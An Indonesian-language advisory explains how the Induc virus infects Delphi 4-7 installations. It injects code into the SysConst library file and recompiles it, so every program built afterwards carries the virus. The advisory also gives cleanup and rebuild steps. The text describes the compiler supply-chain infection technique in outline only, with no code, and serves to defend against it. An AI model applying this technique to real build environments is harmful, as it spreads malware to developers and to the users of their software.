Virus ini HANYA bisa aktif di komputer yang terinstal compiler Delphi versi 4-7 yang biasa terdapat di komputer kalangan developer/programmer Delphi. Dengan kata lain, di komputer pada umumnya virus ini tidak dapat aktif. Virus yang mengincar programmer/developer atau software house yang menggunakan Delphi ini sebenarnya tidaklah mematikan seperti halnya yang digembar-gemborkan oleh beberapa situs.
Virus ini dibuat hanya untuk menumpangi setiap aplikasi yang dibuat menggunakan Delphi. Cara kerjanya adalah dengan mencari tahu apakah di komputer tersebut terdapat aplikasi Delphi versi 4-7. Jika ada, ia kemudian mencari file SysConst.pas bawaan Delphi untuk diinjeksikan “code” yang masih benar-benar dalam bentuk source code. Lalu, file SysConst.pas di-compile agar menghasilkan file SysConst.dcu. Sementara file SysConst.dcu yang asli di-rename oleh virus tersebut menjadi SysConst.bak. File yang telah terkontaminasi virus dapat ditemukan pada direktori \Program Files\Borland\DelphiX\Lib, dimana X menunjukan versi Delphi.
Apa yang terjadi jika virus ini aktif?Tentu saja, setiap aplikasi yang dibuat menggunakan Delphi akan ditumpangi oleh kode virus ini. Contohnya saat programmer menggunakan unit SysUtils dalam programnya. Tapi, penting untuk Anda ketahui bahwa virus ini hanya bisa menyebarkan dirinya jika di komputer Anda terdapat Delphi versi 4-7 dan dia tidak melakukan tindakan pengrusakan, seperti menghapus file ataupun hal lainnya. Jadi, setiap programmer yang membuat software menggunakan Delphi yang mengandung kode virus ini, maka software tersebut akan dideteksi sebagai virus oleh antivirus, akibatnya software tersebut di-block dan tidak bisa digunakan. Dan tidak bisa dipungkiri, sudah banyak aplikasi yang dibuat dengan Delphi, bahkan yang populer sekalipun, berhasil ditumpangi olehnya. Salah satu yang termasuk di antaranya adalah komponen third-party (pihak ketiga) dari sebuah developer profesional yang digunakan oleh PCMAV generasi 2.1x.
Lalu bagaimana cara membersihkan komputer dari virus ini?Untuk saat ini, tindakan yang bisa dilakukan pada file terinfeksi hanyalah menghapus file hasil kompilasi Delphi. Lalu, lakukan rebuild ulang terhadap seluruh aplikasi yang dibuat menggunakan Delphi yang terinfeksi. Namun sebelum melakukan rebuild atau compile ulang, Anda perlu untuk memperbaiki file SysConst.dcu yang telah terinfeksi. Caranya, cukup hapus file SysConst.dcu, lalu copy file SysConst.bak menjadi SysConst.dcu. Dan biarkan saja file SysConst.bak, agar komputer Anda tidak terinfeksi lagi. Kesemua file tersebut dapat Anda temukan pada direktori program Delphi, default-nya di “\Program Files\Borland\DelphiX\Lib”, dimana X menunjukan versi Delphi. Cara termudah, lakukan scan menggunakan PCMAV Express for Induc untuk mengatasi virus ini dengan tuntas. Dan terakhir, silakan kontak pembuat software tersebut dan beritahukan bahwa softwarenya telah ditumpangi oleh kode virus Induc.
Sekali lagi, tidak perlu khawatir berlebihan. Selama Anda bukan seorang programmer/developer Delphi dan tidak menggunakan compiler Delphi versi 4-7 di komputer Anda, maka dipastikan virus ini tidak akan pernah dapat aktif.